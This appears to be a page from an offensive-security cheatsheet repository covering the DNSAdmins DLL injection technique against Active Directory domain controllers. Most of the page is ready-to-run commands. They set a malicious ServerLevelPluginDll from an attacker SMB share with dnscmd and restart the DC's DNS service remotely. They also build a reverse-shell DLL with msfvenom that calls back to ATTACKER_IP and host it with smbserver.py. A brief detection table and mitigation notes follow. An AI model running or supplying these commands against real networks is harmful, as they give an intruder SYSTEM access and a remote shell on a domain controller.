daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-46-dnsadmins-dll-injection.md (3332B)


      1 ---
      2 title: "Attack #46 β€” DNSAdmins DLL Injection"
      3 description: "Members of the DnsAdmins group can configure the DNS service to load an arbitrary DLL via the ServerLevelPluginDll registry key. Since the DNS service…"
      4 category: active-directory
      5 subcategory: "Privilege & Group Abuse"
      6 tags: ["active-directory"]
      7 tools: ["PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/🟣 Attack #46 β€” DNSAdmins DLL Injection.md"
     11 ---
     12 # 🟣 Attack #46 β€” DNSAdmins DLL Injection
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Members of the **DnsAdmins** group can configure the DNS service to load an arbitrary DLL via the `ServerLevelPluginDll` registry key. Since the DNS service runs as **SYSTEM** on Domain Controllers, loading a malicious DLL grants SYSTEM-level code execution on the DC.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Membership in DnsAdmins group** | Or equivalent permission to configure DNS |
     27 | **DNS service on DC** | Standard β€” runs on DCs by default |
     28 | **SMB share hosting DLL** | DLL must be accessible from DC |
     29 
     30 ***
     31 
     32 ## πŸ’» Full Commands
     33 
     34 ```powershell
     35 # ── Check group membership ────────────────────────────────────────────────────
     36 net user low_user /domain | findstr /i "dnsadmins"
     37 
     38 # ── Set malicious DLL plugin ──────────────────────────────────────────────────
     39 dnscmd DC01.corp.local /config /serverlevelplugindll \\ATTACKER\share\evil.dll
     40 
     41 # ── Restart DNS service (requires restart to load DLL) ────────────────────────
     42 sc \\DC01.corp.local stop dns
     43 sc \\DC01.corp.local start dns
     44 # DLL executes as SYSTEM on DC01
     45 
     46 # ── Cleanup β€” remove the plugin DLL config ────────────────────────────────────
     47 dnscmd DC01.corp.local /config /serverlevelplugindll ""
     48 ```
     49 
     50 ```bash
     51 # ── Generate reverse shell DLL ────────────────────────────────────────────────
     52 msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 \
     53   -f dll -o evil.dll
     54 
     55 # ── Host on SMB share ─────────────────────────────────────────────────────────
     56 smbserver.py share /path/to/dll/ -smb2support
     57 ```
     58 
     59 ***
     60 
     61 ## πŸ›‘οΈ Detection β€” Event IDs
     62 
     63 | Event ID | Source | What to Look For |
     64 |---|---|---|
     65 | **770** | DNS Server Log | DNS plugin DLL loaded |
     66 | **7045** | System Log | DNS service restart |
     67 | **4688** | Security Log | dnscmd.exe execution with ServerLevelPluginDll argument |
     68 
     69 ***
     70 
     71 ## πŸ”— Attack Chain Context
     72 
     73 ```
     74 [DNSAdmins] ──→ DLL Injection β†’ SYSTEM on DC
     75          β”‚
     76          β”œβ”€β”€β†’ πŸ”— DnsAdmins membership β†’ SYSTEM on DC β†’ DCSync
     77          β”œβ”€β”€β†’ ⚠️ Requires DNS service restart β€” may cause brief DNS outage
     78          └──→ πŸ’€ Defeated by: audit DnsAdmins membership, monitor dnscmd usage
     79 ```
     80 
     81 ***
     82 
     83 > βœ… **Attack #46 β€” DNSAdmins complete.**